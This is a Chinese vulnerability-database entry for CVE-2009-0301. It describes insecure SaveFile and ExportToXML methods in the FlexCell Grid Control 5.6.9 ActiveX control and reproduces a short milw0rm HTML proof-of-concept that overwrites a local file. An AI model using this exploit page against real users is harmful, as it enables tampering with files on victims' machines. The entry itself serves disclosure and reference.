https://www.exploit-db.com/exploits/7868
https://cxsecurity.com/issue/WLB-2009010239
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-379
Grid2000 FlexCell Grid Control 控件FlexCell.Grid ActiveX多个不安全方式漏洞






漏洞ID | 1117299 | 漏洞类型 | 其他 |
发布时间 | 2009-01-26 | 更新时间 | 2009-01-28 |
![]() |
CVE-2009-0301 | ![]() |
CNNVD-200901-379 |
漏洞平台 | Windows | CVSS评分 | 6.8 |
|漏洞来源
|漏洞详情
FlexCellGridControl5.6.9版本中的FlexCell.GridActiveX控件(FlexCell.ocx)存在多个不安全方式漏洞。远程攻击者可以借助(1)保存文件和(2)输出到XML,创建和重写任意文件。
|漏洞EXP
<HTML>
<BODY>
<b>
Author : Houssamix <br/> <br/> <br/>
FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/>
ExportToXML() is vuln to <br/>
<b/>
<object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object>
<SCRIPT>
/*
Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe()
{
File = "c:\\hsmx.txt"
hsmx.SaveFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
# milw0rm.com [2009-01-26]
|参考资料
来源:BID
名称:33453
链接:http://www.securityfocus.com/bid/33453
来源:MILW0RM
名称:7868
链接:http://www.milw0rm.com/exploits/7868
来源:SECUNIA
名称:33664
链接:http://secunia.com/advisories/33664
检索漏洞
开始时间
结束时间